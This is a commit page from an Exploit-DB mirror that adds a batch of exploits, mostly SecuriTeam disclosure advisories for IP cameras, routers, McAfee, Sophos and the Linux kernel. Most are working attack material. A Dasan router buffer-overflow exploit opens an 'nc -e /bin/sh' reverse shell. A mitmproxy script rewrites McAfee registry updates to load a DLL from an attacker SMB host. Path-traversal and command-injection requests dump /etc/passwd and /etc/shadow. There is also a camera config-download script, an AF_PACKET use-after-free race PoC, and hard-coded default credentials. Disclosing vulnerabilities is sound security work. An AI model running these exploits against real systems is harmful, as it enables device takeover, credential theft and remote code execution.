bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-02-16

Browse source 
45 changes to exploits/shellcodes

Cisco ASA - Crash PoC
Cisco ASA - Crash (PoC)

GNU binutils 2.26.1 - Integer Overflow (POC)
GNU binutils 2.26.1 - Integer Overflow (PoC)
K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read
Linux Kernel - 'AF_PACKET' Use-After-Free
Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service
Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2)
Microsoft Edge Chakra JIT - Memory Corruption
Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass
Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions
Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion
Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion
Microsoft Edge Chakra JIT - 'LdThis' Type Confusion
Pdfium - Pattern Shading Integer Overflows
Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace
Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow
Hotspot Shield - Information Disclosure
Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation
Nitro Pro PDF - Multiple Vulnerabilities
Odoo CRM 10.0 - Code Execution
Dashlane - DLL Hijacking

LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation
Trustwave SWG 11.8.0.27 - SSH Unauthorized Access
Ichano AtHome IP Cameras - Multiple Vulnerabilities
Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution
Ikraus Anti Virus 2.16.7 - Remote Code Execution
McAfee Security Scan Plus - Remote Command Execution
OrientDB - Code Execution
360 Total Security - Local Privilege Escalation
HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution
Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution
iBall WRA150N - Multiple Vulnerabilities
GitStack - Unauthenticated Remote Code Execution
Monstra CMS - Remote Code Execution
Ametys CMS 4.0.2 - Unauthenticated Password Reset
DblTek - Multiple Vulnerabilities
FiberHome - Directory Traversal
PHP Melody 2.7.3 - Multiple Vulnerabilities
Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure
Horde Groupware 5.2.21 - Unauthorized File Download
QNAP HelpDesk < 1.1.12 - SQL Injection
Hanbanggaoke IP Camera - Arbitrary Password Change
McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution
Sophos XG Firewall 16.05.4 MR-4 - Path Traversal
Cisco DPC3928 Router - Arbitrary File Disclosure
IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities
Geneko Routers - Unauthenticated Path Traversal
Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
This commit is contained in:
Offensive Security 2018-02-16 05:01:50 +00:00
parent 15ecd79646
commit e630f8c249
46 changed files with 5949 additions and 385 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

37
exploits/hardware/remote/44048.md Normal file
View file

@ -0,0 +1,37 @@
## Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Ichano IP Cameras.
AtHome Camera is “a remote video surveillance app which turns your personal computer, smart TV/set-top box, smart phone, and tablet into a professional video monitoring system in a minute.”
The vulnerabilities found are:
Hard-coded username and password telnet
Hard-coded username and password Web server
Unauthenticated Remote Code Execution
## Credit
An independent security researcher, Tim Carrington, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact Ichano since November 21st 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
CVE: CVE-2017-17761
## Vulnerabilities details
Hard-coded username and password telnet
The device runs a telnet server at startup with a default password of 123.
Hard-coded username and password Web server
In /app/www/doc/script/login.js, in the function DoLogin(), client side validation is used to login a user:
```
if($("#UserName").val()=="super_yg"){jumpPage();return}
```
A user can login with these credentials and can then take control of the device over http:
Unauthenticated Remote Code Execution
The device runs “noodles” binary a service on port 1300 that allows a remote (LAN) unauthenticated user to run arbitrary commands.
The binary has a set of commands he can run if a user will use the following “protocol”, command to be run is enclosed like html tags, i.e. <system>id</system>, a successful execution results in <system_ack>ok</system_ack>.

40
exploits/hardware/webapps/44043.md Normal file
View file

@ -0,0 +1,40 @@
## Vulnerabilities summary
The following advisory describes two (2) vulnerabilities found in iB-WRA150N devices, firmware 1.2.6 build 110401 Rel.47776n.
iB-WRA150N is “a powerful solution to Internet connectivity at home, small offices and work stations. The key is if you are using an ADSL2+ connection now and later decide to change to Broadband or vice-versa you dont need to change your router. This iBall router is 2-in-1 and compatible to both Broadband connection as well as ADSL2 connection (Telephone connection or cable operator connection). ”
The vulnerabilities found are:
Hard coded accounts
Remote command execution
## Credit
An independent security researcher, maxki4x, has reported this vulnerabilities to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact iBall since December 20 2017, repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.
CVE: CVE-2018-6388
## Vulnerabilities details
Hard coded accounts
Username: admin
Password: admin
Username: support
Password: support
Username: user
Password: user
## Remote command execution
After we logged in to the victims router using the hard coded accounts, we can trigger the second vulnerability and achieve remote command execution.
User controlled input is not sufficiently filtered, allowing user to inject arbitrary commands into ping test arguments in Diagnostics page.
By entering the following input in the ping test arguments in Diagnostics page, the attacker can get the /etc/passwd file:
```
127.0.0.1;cat/etc/passwd
```

48
exploits/hardware/webapps/44058.md Normal file
View file

@ -0,0 +1,48 @@
## Vulnerability Summary
The following advisory describes sensitive information Disclosure found in Tiandy IP cameras version 5.56.17.120
Tianjin Tiandy Digital Technology Co., Ltd ( Tiandy Tech) is “one of top 10 leading CCTV manufacturer in China and a global supplier of advanced video surveillance solutions.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We tried to contact Tiandy starting from August 16 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.
CVE: CVE-2017-15236
## Vulnerability details
Tiandy uses a proprietary protocol, a flaw in the protocol allows an attacker to forge a request that will return configuration settings of the Tiandy IP camera.
## Proof of Concept
By sending the following request, an attacker can download the following files:
``
config_server.ini
extendword.txt
config_ptz.dat
config_right.dat
config_dg.dat
config_burn.dat
```
## POC.PY
```
import socket
ip = '192.168.1.1'
data1 = '\x74\x1f\x4a\x84\xc8\xa8\xe4\xb3\x18\x7f\xd2\x21\x08\x00\x45\x00\x00\xcc\x3e\x9a\x40\x00\x40\x06\xd4\x13\xac\x10\x65\x75\x6e\x31\xa7\xc7\x43\x5b\x0b\xb9\x85\xbc\x1d\xf0\x5b\x3e\xe8\x32\x50' +
'\x18\x7f\xa4\xc6\xcf\x00\x00\xf1\xf5\xea\xf5\x74\x00\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x00' + ip +
'\x09\x50\x52\x4f\x58\x59\x09\x43\x4d\x44\x09\x44\x48\x09\x43\x46\x47\x46\x49\x4c\x45\x09\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x09\x36\x09\x63\x6f\x6e\x66\x69\x67\x5f\x73\x65\x72\x76\x65\x72\x2e' +
'\x69\x6e\x69\x09\x65\x78\x74\x65\x6e\x64\x77\x6f\x72\x64\x2e\x74\x78\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x70\x74\x7a\x2e\x64\x61\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x72\x69\x67\x68\x74\x2e' +
'\x64\x61\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x64\x67\x2e\x64\x61\x74\x09\x63\x6f\x6e\x66\x69\x67\x5f\x62\x75\x72\x6e\x2e\x64\x61\x74\x0a\x0a\x0a'
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,3001))
s.send(data1)
while True:
buf = s.recv(64)
if not len(buf):
break
print buf
```

49
exploits/hardware/webapps/44061.md Normal file
View file

@ -0,0 +1,49 @@
## Vulnerability summary
The following advisory describes an arbitrary password change vulnerability found in Hanbanggaoke webcams.
Beijing Hanbang Technology, “one of the first enterprises entering into digital video surveillance industry, has been focusing on R&D of products and technology of digital video surveillance field. While providing product and technical support, it also provides overall solution for the industrial system; it has successfully provided system implementation and service supports for several industries.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
We tried to contact Hanbanggaoke since the 8th of August 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.
## Vulnerability details
User controlled input is not sufficiently sanitized, by sending a PUT request to /ISAPI/Security/users/1 HTTP/1.1 an attacker can change the admin password.
CVE: CVE-2017-14335
## Proof of Concept
In order to exploit the vulnerability, we need to use proxy tool (like Burp). We then connect to the victims machine and need to capture the data package.
We then edit the data of the following PUT request:
```
PUT /ISAPI/Security/users/1 HTTP/1.1
Host: x.x.x.x
Content-Length: 321
Cache-Control: max-age=0
Origin: http://x.x.x.x
X-Requested-With: XMLHttpRequest
Authorization: Basic YWRtaW46ODg4ODg4
Content-Type: application/x-www-form-urlencoded
Accept: application/xml, text/xml, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
If-Modified-Since: 0
Referer: http://x.x.x.x/doc/page/paramconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: updateTips=true; streamType=0; BufferLever=1; userInfo80=YWRtaW46ODg4ODg4; DevID=5; language=zh; curpage=paramconfig.asp%254
Connection: close
<?xml version="1.0" encoding="UTF-8"?><User><id>1</id><userName>admin</userName><password>admin</password><bondIpList><bondIp><id>1</id><ipAddress>0.0.0.0</ipAddress><ipv6Address>::</ipv6Address></bondIp></bondIpList><macAddress/><userLevel>administrator</userLevel><attribute><inherent>true</inherent></attribute></User>
```
The successful response will be:
Now, we can login with as administrator:
User: admin
Password: admin

119
exploits/hardware/webapps/44062.md Normal file
View file

@ -0,0 +1,119 @@
## Vulnerabilities Summary
The following advisory describes a Remote Command Execution found in McAfee McAfee LiveSafe (MLS) versions prior to 16.0.3. The vulnerability allows network attackers to modify the Windows registry value associated with the McAfee update via the HTTP backend-response.
McAfee Security Scan Plus is a free diagnostic tool that ensures you are protected from threats by actively checking your computer for up-to-date anti-virus, firewall, and web security software. It also scans for threats in any open programs.
## Credit
An independent security research company, Silent Signal, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address this vulnerability.
For more information: https://service.mcafee.com/webcenter/portal/cp/home/articleview?articleId=TS102714
CVE: CVE-2017-3898
## Vulnerabilities Details
An active network attacker can achieve remote code execution in multiple McAfee products. Affected products retrieve configuration data over plaintext HTTP channel from the http://COUNTRY.mcafee.com/apps/msc/webupdates/mscconfig.asp URL (where COUNTRY is a two letter country identifier, e.g. “uk”).
The response body contains XML formatted data, similar to the following:
```
<webservice-response response-version="1.0" frequency="168"
verid="1#1316#15#0#2">
<update>
<reg key="HKLM\SOFTWARE\McAfee\MSC\Settings\InProductTransaction"
name="enable" type="REG_DWORD" value="1" obfuscate="0"/>
</update>
</webservice-response>
```
The response describes a Registry modification with the reg tags under the webservice-response/update path.
This request and subsequent update is triggered automatically, first upon the installation of the software then after the number of hours indicated by the frequency attribute of the webservice-request node (168 minutes by default).
The update is executed by the PlatformServiceFW.dll of the McSvHost.exe process by invoking the mcsvrcnt.exe program with the /update argument. The McSvHost.exe process is running with SYSTEM privileges that is inherited by mcsvrcnt.exe that implements the Registry change.
As a result active network attackers can modify the server responses to write the Registry of the target with SYSTEM privileges.
## Proof of Concept
The exploit runs as a proxy that intercepts and modifies plaintext HTTP requests and responses. Since the target software performs certificate validation for HTTPS services its important to let these connections pass through without modification.
In regular HTTP proxy mode this can be achieved by using the --ignore command line parameter of mitmproxy:
```
mitmproxy -s mcreggeli_inline.py --ignore '.*'
```
In case of transparent proxy mode the above parameter should not be provided:
```
mitmproxy -s mreggeli_inline.py T
```
For transparent proxy mode the following commands configure NAT and port redirection on common Debian-based Linux distributions (eth0 is the interface visible to the target, eth1 is connected to the internet):
```
iptables -t nat -A PREROUTING -i eth0 -p tcp \
--dport 80 -j REDIRECT --to 8080
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
sysctl net.ipv4.ip_forward=1
```
The script looks for the “mscconfig.asp” string in the request URL. If found the XML response body is deserialized, and new reg nodes are added based on the REG variable declared at the beginning of the script. The REG variable is a list of dictionaries, each dictionary containing the following keys:
Key The name of the Registry key to modify (e.g. “HKLM\SYSTEM\CurrentControlSet\Services\mfevtp”, backslashes should be escaped properly for Python)
Type Type of the value to create (e.g. “REG_SZ” for strings)
Name Name of the value to create
Value Value to be created
The exploit also changes the frequency attribute to 1 so re-exploitation can be performed in shorter time (in 1 hour) if needed. After the new nodes are inserted, the resulting object is serialized and put in place of the original response body.
To demonstrate code execution one of the own service entries of the affected McAfee products (mfevtp McAfee Process Validation Service) was overwritten: the ImagePath value of the HKLM\SYSTEM\CurrentControlSet\Services\mfevtp key was replaced to point the built-in rundll32.exe with an UNC path argument pointing to the attacker host (The payload (test.dll) was served with Metasploits smb_delivery module during testing):
The REG variable was declared like the following:
```
REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp", "type":"REG_SZ","name":"ImagePath", "value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]
```
In this way SYSTEM level command execution is triggered after the machine is restarted, the exploit was not caught by the McAfee software.
mcreggeli_inline.py
```
#!/usr/bin/env python3
#
# HTTP proxy mode:
# mitmproxy -s mcreggeli_inline.py --ignore '.*'
#
# Transparent proxy mode:
# mitmproxy -s mcreggeli_inline.py -T --host
#
from mitmproxy import ctx, http
from lxml import etree
REG=[{"key":"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp","type":"REG_SZ","name":"ImagePath","value":"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0"},]
def response(flow):
if flow.request.scheme == "http" and "mscconfig.asp" in flow.request.url:
try:
oxml=etree.XML(flow.response.content)
oxml.set("frequency","1")
update=oxml.xpath("//webservice-response/update")[0]
for r in REG:
reg=etree.SubElement(update,"reg")
reg.set("key", r["key"])
reg.set("type", r["type"])
reg.set("obfuscate", "0")
reg.set("name", r["name"])
reg.set("value", r["value"])
#ctx.log(etree.tostring(oxml))
flow.response.content=etree.tostring(oxml)
ctx.log("[+] [MCREGGELI] Payload sent")
except etree.XMLSyntaxError:
ctx.log("[-] [MCREGGELI] XML deserialization error")
```

75
exploits/hardware/webapps/44065.md Normal file
View file

@ -0,0 +1,75 @@
## Vulnerabilities Summary
The following advisory describe two (2) vulnerabilities, a Path Traversal and a Missing Function Level Access Control, in Sophos XG Firewall 16.05.4 MR-4.
Sophos XG Firewall provides “unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls”.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
The vendor has released patches to address this vulnerability:
“The patches were released as part of SFOS 16.05.5 MR5:
https://community.sophos.com/products/xg-firewall/b/xg-blog/posts/sfos-16-05-5-mr5-released
Our internal bug number was NC-18958, mentioned in the changelog”
CVE: CVE-2017-12854
## Vulnerabilities Details
The Sophos XG Firewall hosts 2 different web portals. The first is the web administration portal used to manage the firewall (Sophos XG Fireweal portal), the second is the “User Portal” used to unprivileged user to access to a restricted group of function like to trace their traffic quotas, to see SMTP quarantined mail and to download authentication client.
The appliance has a web download function in Sophos XG Fireweal portal to allow downloading of a range of file like, logs and certificate keys.
Crafting the download request and adding a path traversal vector to it, an authenticated user, can use this function to download files that are outside the normal scope of the download feature (including sensitive files).
In addition, the function can be called from a low privileged user, a user that is logged on to the User Portal (i.e. Missing Function Level Access Control), a combinations of these two vulnerabilities can be used to compromise the integrity of the server, by allowing a User Portal to elevate his privileges.
## Proof of Concept
Log in the Sophos XG Firewall admin portal
Using developer tools of Firefox (F12) or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the csrf code.
Open the Hackbar or use other tools to send a new crafted request:
```
URL https://192.168.0.188:4444/webconsole/Controller?filename=../../../etc/passwd&mode=4010
postdata csrf=<== THE PARAMETER YOU HAVE FOUND ==>
referrer https://192.168.0.188:4444/webconsole/webpages/index.jsp
```
This will start the download of the /etc/passwd file:
Create from the admin portal an user of the User Portal (Authentication > User > Add)
Login in the User Portal using the new user
Using developer tools of Firefox or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the csrf code.
Open the hack bar or use other tools to send a new crafted request:
```
URL https://192.168.0.188/userportal/Controller?filename=../../../etc/passwd&mode=4010&json=%7B%22lang%22%3A%220%22%7D
postdata csrf=<== THE PARAMETER YOU HAVE FOUND ==>
referrer https://192.168.0.188/userportal/webpages/myaccount/index.jsp
```
This will start the download

46
exploits/hardware/webapps/44070.md Normal file
View file

@ -0,0 +1,46 @@
## Vulnerability Summary
The following advisory describes an arbitrary file disclosure vulnerability found in Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway.
The Cisco DPC3928AD DOCSIS is a home wireless router that is currently "Out of support" but is provided by ISPs world wide.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
We reported the vulnerability to Cisco and they informed us that the Cisco DPC3928AD sold to Technicolor: “The Cisco DPC3928AD was actually sold to Technicolor a while back. In this case, we will ask you to please contact Technicolor at security@technicolor.com to open a case with them”
After connecting Technicolor, they informed us that the product has reached end of life and they will not patch the vulnerability: “After an extensive search for the product to perform validation, we were unable to source the gateway to validate your proof of concept. Due to the end-of-sale and end-of-life of the product Technicolor will not be patching the bug.”
CVE: CVE-2017-11502
## Vulnerability details
Cisco DPC3928AD DOCSIS 3.0 2-PORT Voice Gateway vulnerability is present on its TCP/4321 port .
## Proof of Concept
An attacker can get the /etc/passwd file from the remote device, by sending the following request:
```
GET /../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1
Host: 192.168.0.10:4321
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
The Router response the next output with the passwd content:
```
HTTP/1.1 200 OK
Content-Type: text/html
SERVER: Linux/#2 Wed Nov 12 10:23:46 CST 2014 UPnP/1.0 Broadcom
UPNP/0.9
Content-Length: 247
Accept-Ranges: bytes
Date: Thu, 10 Nov 2016 16:01:04 GMT
root:HAdbdMWcXHOuKQ:0:0:root:/:/bin/sh
admin:KASJakljhHqiuJ:0:0:aDMINISTRATOR:/:/bin/false
```

70
exploits/hardware/webapps/44072.md Normal file
View file

@ -0,0 +1,70 @@
## Vulnerability Summary
The following advisory describes a Unauthenticated Path Traversal vulnerability found in Geneko GWR routers series.
Geneko GWG is compact and cost effective communications solution that provides cellular capabilities for fixed and mobile applications such as data acquisition, smart metering, remote monitoring and management. GWG supports a variety of radio bands options on 2G, 3G and 4G cellular technologies.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We have informed Geneko of the vulnerability on the 28th of May 2017, the last email we received from them was on the 7th of June 2017. We have no further updates from Geneko regarding the availability of a patch or a workaround for the vulnerability.
CVE: CVE-2017-11456
## Vulnerability Details
User controlled input is not sufficiently sanitized, and then passed to a function responsible for accessing the filesystem. Successful exploitation of this vulnerability enables a remote unauthenticated user to read the content of any file existing on the host, this includes files located outside of the web root folder.
By sending the following GET request, You get direct access to the configuration file, which allows you to log in to the login panel:
```
GET /../../../../../../../../../../../../mnt/flash/params/j_admin_admin.params HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Connection: close
Upgrade-Insecure-Requests: 1
```
## Router response:
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 121
{"enable":true,"username":"admin","password”:"xxx!","web_access":0,"http_port":80,"https_port":443,"gui_timeout":15}
In this case, the admin user is configured to have access to the shell (SSH Access) as can be seen in the /etc/passwd
admin:x:0:0:root:/root:/root/cli
```
## Proof of Concept
path_traversal.py
```
import requests
import sys
domain = sys.argv[1]
r = requests.get("http://"+domain+"/../../../../../etc/shadow")
print r.content
```
The router then will response with:
```
root:$1$ryjw5yTs$xoQlzavABZ5c7gQuD7jKO0:10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
admin:$1$72G6z9YF$cs5dS2elxOD3qicUTlEHO/:10933:0:99999:7:::
```

82
exploits/hardware/webapps/44074.md Normal file
View file

@ -0,0 +1,82 @@
## Vulnerability Summary
The following advisory describes a buffer overflow that leads to remote code execution found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146
Dasan Networks GPON ONT WiFi Router “is indoor type ONT dedicated for FTTH (Fibre to the Home) or FTTP (Fiber to the Premises) deployments. That can work as simple Bridge or behave as Router/NAT. Its cost-effective CPE that meets carrier-class requirement for Telcom industry and guarantee reliable service proven in the field.”
## Credit
An independent security researcher, TigerPuma (at) Fosec.vn, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
We tried to contact Dasan since October 8 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.
## Vulnerability details
All cgi in Dasan web service are symbolic link of cgipage.cgi, and when client request, lighttpd will invoke the corresponding path.
The buffer overflow vulnerability found in function login_action which handler login request.
The function uses strcpy without check length of input from client request.
If we will look at the stack, we can see that we can trigger the buffer overflow and in the end to control the pc.
## Proof of Concept
```
import sys
import socket
import json
import time
import struct
import ssl
if len(sys.argv) != 4:
print "Use: {} ip port connectback".format(sys.argv[0])
sys.exit(1)
host = str(sys.argv[1])
port = int(sys.argv[2])
connectback = str(sys.argv[3])
buf = 1024
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#sock.settimeout(10)
clientsocket = ssl.wrap_socket(sock)
#clientsocket = sock
clientsocket.connect((host, port))
addr_libc = 0x2ad0c000 # 0x2ad0e000 with H640DW
# rop1
rop1 = addr_libc + 0x00115d40 #addiu $a0,$sp,0x18 | jalr $s0
addr_rop1 = struct.pack(">i",rop1)
#rop2
system = addr_libc + 0x0003CC9C #system
addr_system = struct.pack(">i",system)
# execute command
command = "nc " + connectback + " -e /bin/sh;"
payload = "A"*(756 - 0x28) + addr_system + 'C'*(0x28-8) + addr_rop1 + ';'*24 + command
data = "action={}&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n".format(payload)
http_payload = """POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: {}\r\n\r\n{}""".format(len(data),data)
print http_payload
clientsocket.send(http_payload)
respond_raw = clientsocket.recv(buf).strip()
print respond_raw
respond_raw = clientsocket.recv(buf).strip()
print respond_raw
respond_raw = clientsocket.recv(buf).strip()
print respond_raw
clientsocket.close()
```

306
exploits/linux/dos/44053.md Normal file
View file

@ -0,0 +1,306 @@
## Vulnerabilities summary
The following advisory describes a use-after-free vulnerability found in Linux Kernels implementation of AF_PACKET that can lead to privilege escalation.
AF_PACKET sockets “allow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher levels protocol headers”
## Credit
The vulnerability was discovered by an independent security researcher which reported this vulnerabilities to Beyond Securitys SecuriTeam Secure Disclosure program.
## Vendor response
Update 1
CVE: CVE-2017-15649
“It is quite likely that this is already fixed by:
packet: hold bind lock when rebinding to fanout hook http://patchwork.ozlabs.org/patch/813945/
Also relevant, but not yet merged is
packet: in packet_do_bind, test fanout with bind_lock held http://patchwork.ozlabs.org/patch/818726/
We verified that this does not trigger on v4.14-rc2, but does trigger when reverting that first mentioned commit (008ba2a13f2d).”
## Vulnerabilities details
This use-after-free is due to a race condition between fanout_add (from setsockopt) and bind on a AF_PACKET socket.
The race will cause __unregister_prot_hook() from packet_do_bind() to set po->running to 0 even though a packet_fanout has been created from fanout_add().
This allows us to bypass the check in unregister_prot_hook() from packet_release() effectively causing the packet_fanout to be released and still being referenced from the packet_type linked list.
## Crash Proof of Concept
``
// Please note, to have KASAN report the UAF, you need to enable it when compiling the kernel.
// the kernel config is provided too.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <pthread.h>
#include <sys/utsname.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <fcntl.h>
#define IS_ERR(c, s) { if (c) perror(s); }
struct sockaddr_ll {
unsigned short sll_family;
short sll_protocol; // big endian
int sll_ifindex;
unsigned short sll_hatype;
unsigned char sll_pkttype;
unsigned char sll_halen;
unsigned char sll_addr[8];
};
static int fd;
static struct ifreq ifr;
static struct sockaddr_ll addr;
void *task1(void *unused)
{
int fanout_val = 0x3;
// need race: check on po->running
// also must be 1st or link wont register
int err = setsockopt(fd, 0x107, 18, &fanout_val, sizeof(fanout_val));
// IS_ERR(err == -1, "setsockopt");
}
void *task2(void *unused)
{
int err = bind(fd, (struct sockaddr *)&addr, sizeof(addr));
// IS_ERR(err == -1, "bind");
}
void loop_race()
{
int err, index;
while(1) {
fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
IS_ERR(fd == -1, "socket");
strcpy((char *)&ifr.ifr_name, "lo");
err = ioctl(fd, SIOCGIFINDEX, &ifr);
IS_ERR(err == -1, "ioctl SIOCGIFINDEX");
index = ifr.ifr_ifindex;
err = ioctl(fd, SIOCGIFFLAGS, &ifr);
IS_ERR(err == -1, "ioctl SIOCGIFFLAGS");
ifr.ifr_flags &= ~(short)IFF_UP;
err = ioctl(fd, SIOCSIFFLAGS, &ifr);
IS_ERR(err == -1, "ioctl SIOCSIFFLAGS");
addr.sll_family = AF_PACKET;
addr.sll_protocol = 0x0; // need something different to rehook && 0 to skip register_prot_hook
addr.sll_ifindex = index;
pthread_t thread1, thread2;
pthread_create (&thread1, NULL, task1, NULL);
pthread_create (&thread2, NULL, task2, NULL);
pthread_join(thread1, NULL);
pthread_join(thread2, NULL);
// UAF
close(fd);
}
}
static bool write_file(const char* file, const char* what, ...) {
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
close(fd);
return false;
}
close(fd);
return true;
}
void setup_sandbox() {
int real_uid = getuid();
int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) {
printf("[!] unprivileged user namespaces are not available\n");
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
perror("[-] unshare(CLONE_NEWUSER)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/setgroups", "deny")) {
perror("[-] write_file(/proc/self/set_groups)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
perror("[-] write_file(/proc/self/uid_map)");
exit(EXIT_FAILURE);
}
if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
perror("[-] write_file(/proc/self/gid_map)");
exit(EXIT_FAILURE);
}
}
int main(int argc, char *argv[])
{
setup_sandbox();
system("id; capsh --print");
loop_race();
return 0;
}
``
## Crash report
```
[ 73.703931] dev_remove_pack: ffff880067cee280 not found
[ 73.717350] ==================================================================
[ 73.726151] BUG: KASAN: use-after-free in dev_add_pack+0x1b1/0x1f0
[ 73.729371] Write of size 8 at addr ffff880067d28870 by task poc/1175
[ 73.732594]
[ 73.733605] CPU: 3 PID: 1175 Comm: poc Not tainted 4.14.0-rc1+ #29
[ 73.737714] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014
[ 73.746433] Call Trace:
[ 73.747985] dump_stack+0x6c/0x9c
[ 73.749410] ? dev_add_pack+0x1b1/0x1f0
[ 73.751622] print_address_description+0x73/0x290
[ 73.753646] ? dev_add_pack+0x1b1/0x1f0
[ 73.757343] kasan_report+0x22b/0x340
[ 73.758839] __asan_report_store8_noabort+0x17/0x20
[ 73.760617] dev_add_pack+0x1b1/0x1f0
